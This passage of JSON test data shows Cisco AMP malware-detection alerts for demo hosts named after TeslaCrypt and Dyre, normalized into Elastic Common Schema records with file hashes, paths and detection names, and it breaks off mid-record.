"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581752005Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196242", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581753905Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196241", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581755886Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196240", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "file": { + "name": "webinstall.exe", + "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "hash": { + "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "sha256": 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "md5": "e9d8c15e7d18678dd41771f72ed6693c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Dyre" + ], + "hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Dyre", + "hostname": "Demo_Dyre" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581757773Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6176259080131183000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "GenericKD:Dyreza-tpd", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "23:d5:92:eb:f8:9b", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "23:d5:92:eb:f8:9b" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6176259080131182683", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581759663Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251507855229000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251507855228943", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581761565Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251507855229000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251503560261641", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "file": { + "name": "t.exe", + "path": "\\\\?\\C:\\t.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581763451Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251503560262000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251503560261640", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "t.exe", + "pid": 2712, + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "@timestamp": 
"2021-01-15T10:17:36.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581765334Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251503560262000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + 
"group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251503560261639", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "file": { + "name": "t.exe", + "path": "\\\\?\\C:\\t.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581767207Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat 
